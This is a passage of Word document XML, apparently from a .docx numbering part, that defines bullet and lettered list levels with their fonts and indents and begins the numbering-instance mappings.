  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2C0579F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D3E07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F283DDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCD822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05E39BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0F84BB4"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B74199C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="890E68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B8D4BD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BF833EC"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3ED65DBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CBEEB40"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1438" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2158" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2878" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3598" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4318" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5038" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5758" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6478" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7198" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4656053F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5EE3FD4"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1079" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="47025D3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F614E9DC"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1079" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4B6076B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEC26F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C813FF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9DE5B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D8942DA"/>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E0613A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D5A56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E781332"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B92C5392"/>
    <w:lvl w:ilvl="0" w:tplc="48090015">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1944" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4809001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2664" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4809000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3384" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4104" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4809001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4824" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4809000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5544" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6264" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4809001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6984" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FC8756C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86BA0544"/>
    <w:lvl w:ilvl="0" w:tplc="B8FABD80">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068772B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CF69162"/>
    <w:lvl w:ilvl="0" w:tplc="4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F72BCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="501829C4"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>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6C05E15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2506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C746C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48090025"/>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E60B48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF72D0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F653795"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19448BA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0AC35DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EFFAF01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8F17CAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A96A556"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>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907593D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6936A8B2"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7559" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1935699881">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1499691265">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1099913086">
